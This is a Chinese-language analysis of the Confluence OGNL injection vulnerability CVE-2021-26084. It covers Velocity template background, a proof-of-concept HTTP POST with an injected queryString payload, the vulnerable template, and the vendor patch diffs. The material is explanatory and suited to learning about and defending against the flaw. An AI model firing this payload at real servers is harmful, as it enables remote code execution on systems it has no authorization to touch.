CVE-2021-26084 漏洞分析

基础知识

Velocity

• .vm 结尾的文件一般为Velocity模板文件
• $action
  • $action 是 velocity 上下⽂中的⼀个变量，⼀般在进⾏模板渲染前会设置到 context ⾥⾯。
  • $action 是当前访问路由对应的具体 Action 类。
  • $action.xxx 表⽰取对应 Action 类的 xxx 属性值

• ${} 和 $!{}
  • ${} 输出表达式的计算结果，并进行过滤
  • $!{} 原样输出表达式的计算结果，不进行任何过滤
• Velocity自定义标签
  • velocity ⾃定义的标签必须实现 Directive 类的 getName()、getType()、render() 三个⽅法。
  • getName() ⽅法表⽰标签的名字；getType() ⽅法则表⽰是⾏标签（LINE） 还是块标签（BLOCK）； render() ⽅法则⽤来实现标签的具体处理逻辑。
• velocity.properties 文件
  • 模板引擎初始化时会加载此文件
  • 配置log, 字符集编码等

  • userdirective：自定义函数路径

WebWork

• 路由逻辑

Confluence

• Confluence 7.12.3 依赖 Velocity 1.6.4
• Confluence 自定义 Velocity 标签 Tag

OGNL表达式注入

漏洞环境版本

• 7.12.3

漏洞原理

• Confluence自定义的tag标签在渲染过程中在渲染$!的变量时会使用Ognl表达式来渲染
• 检查手段被绕过
• POC

POST /pages/doenterpagevariables.action HTTP/1.1
Host: 0.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: seraph.confluence=10420225%3A99812635f8ead516748600dabcae6fb275114958; JSESSIONID=8476B9EB2D8EF2235053A3CB8A2C0500
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
 
queryString=aaaa\u0027%2b#{3*333}%2b\u0027bbb

• 对应模板文件： confluence/pages/createpage-entervariables.vm

<html>
    <head>
        #requireResource("confluence.web.resources:page-templates")
        <title>$action.getText("page.template.wizard")</title>
    </head>
 
    <body>
        #parse ( "/template/includes/actionerrors.vm" )
        #applyDecorator("root")
        #decoratorParam("helper" $action.helper)
        #decoratorParam("context" "space-pages")
        #decoratorParam("mode" "create-page")
 
        <div class="padded">
            <div class="steptitle" style="margin-top: 10px">$action.getText('pagevariables.step2')</div>
            <p>$action.getText('text.pagevariables.step2.instructions')</p>
 
            <div class="smallfont view-template">
                <div class="wiki-content">$action.renderedTemplateContent</div>
            </div>
 
            <form name="filltemplateform" method="POST" action="doenterpagevariables.action">
                #form_xsrfToken()
                #tag ("Hidden" "name='queryString'" "value='$!queryString'")
                #tag ("Hidden" "name='templateId'" "value='$pageTemplate.id'")
                #tag ("Hidden" "name='linkCreation'" "value='$linkCreation'")
                #tag ("Hidden" "name='title'" "value=title")
                #tag ("Hidden" "name='parentPageId'" "value=parentPageId")
                #tag ("Hidden" "name='fromPageId'" "value=fromPageId")
                #tag ("Hidden" "name='spaceKey'" "value=spaceKey")
 
                <div class="aui-toolbar2" role="toolbar">
                    <div class="aui-toolbar2-inner">
                            <input class="aui-button" type="button" value="$action.getText('back.witharrows.name')" onclick="javascript:history.go(-1)">
                            #tag( "Submit" "name='confirm'" "id=confirm" "value='next.name'" "theme='notable'" "cssClass='aui-button'")
                    </div>
                </div>
            </form>
 
            #parse ( "/pages/page-breadcrumbs.vm" )
        </div>
 
        #end
    </body>
</html>

漏洞修复

补丁

• 补丁脚本运行结果

File 1: 'confluence/users/user-dark-features.vm':
   a. backing up file.. done
   b. updating file.. done
   c. showing file changes..
70c70
<             #tag( "Component" "label='Enable dark feature:'" "name='featureKey'" "value='$!action.featureKey'" "theme='aui'" "template='text.vm'")
---
>             #tag( "Component" "label='Enable dark feature:'" "name='featureKey'" "value=featureKey" "theme='aui'" "template='text.vm'")
   d. validating file changes.. ok
   e. file updated successfully!
 
File 2: 'confluence/login.vm':
   a. backing up file.. done
   b. updating file.. done
   c. showing file changes..
147c147
<                         #tag( "Hidden" "name='token'" "value='$!action.token'" )
---
>                         #tag( "Hidden" "name='token'" "value=token" )
   d. validating file changes.. ok
   e. file updated successfully!
 
File 3: 'confluence/pages/createpage-entervariables.vm':
   a. backing up file.. done
   b. updating file.. done
   c. showing file changes..
24c24
<                 #tag ("Hidden" "name='queryString'" "value='$!queryString'")
---
>                 #tag ("Hidden" "name='queryString'" "value=queryString")
26c26
<                 #tag ("Hidden" "name='linkCreation'" "value='$linkCreation'")
---
>                 #tag ("Hidden" "name='linkCreation'" "value=linkCreation")
   d. validating file changes..ok
   e. file updated successfully!
 
File 4: 'confluence/template/custom/content-editor.vm':
   a. backing up file.. done
   b. updating file.. done
   c. showing file changes..
64c64
<         #tag ("Hidden" "name='queryString'" "value='$!queryString'")
---
>         #tag ("Hidden" "name='queryString'" "value=queryString")
85c85
<             #tag ("Hidden" "id=sourceTemplateId" "name='sourceTemplateId'" "value='${templateId}'")
---
>             #tag ("Hidden" "id=sourceTemplateId" "name='sourceTemplateId'" "value=templateId")
   d. file updated successfully!
 
File 5: 'confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader*.jar':
   a. extracting templates/editor-preload-container.vm from confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar..
Archive:  confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar
  inflating: ./templates/editor-preload-container.vm
   b. updating file.. done
   c. showing file changes..
56c56
< #tag ("Hidden" "id=syncRev" "name='syncRev'" "value='$!{action.syncRev}'")
---
> #tag ("Hidden" "id=syncRev" "name='syncRev'" "value=syncRev")
   d. validating file changes.. ok
   e. updating confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar with ./templates/editor-preload-container.vm..updating: templates/editor-preload-container.vm (deflated 59%)
-rw-r--r--  1 zhangxinqi  staff  13369  8 27 02:02 confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar
   f. cleaning up temp files..ok
   g. extracting templates/editor-preload-container.vm from confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar again to check changes within JAR..
Archive:  confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar
  inflating: ./templates/editor-preload-container.vm
   h. validating file changes for file within updated JAR.. ok
   i. cleaning up temp files..ok
 
Update completed!

• 将模板文件中的$!删除
• 将 $action $!action 都删除
• 所有的改动都位于tag标签下
• 涉及5个文件的更改
  • confluence/users/user-dark-features.vm
    • http://127.0.0.1:8090/users/darkfeatures.action
    • 相关文档：Enable Edit in Office as a dark feature in Confluence | Confluence | Atlassian Documentation
  • confluence/login.vm
    • 注册功能
  • confluence/pages/createpage-entervariables.vm
    • http://127.0.0.1:8090/pages/doenterpagevariables.action
  • confluence/template/custom/content-editor.vm
  • templates/editor-preload-container.vm

参考资料

• Confluence objects accessible from Velocity (atlassian.com)
• dinhbaouit/CVE-2021-26084 (github.com)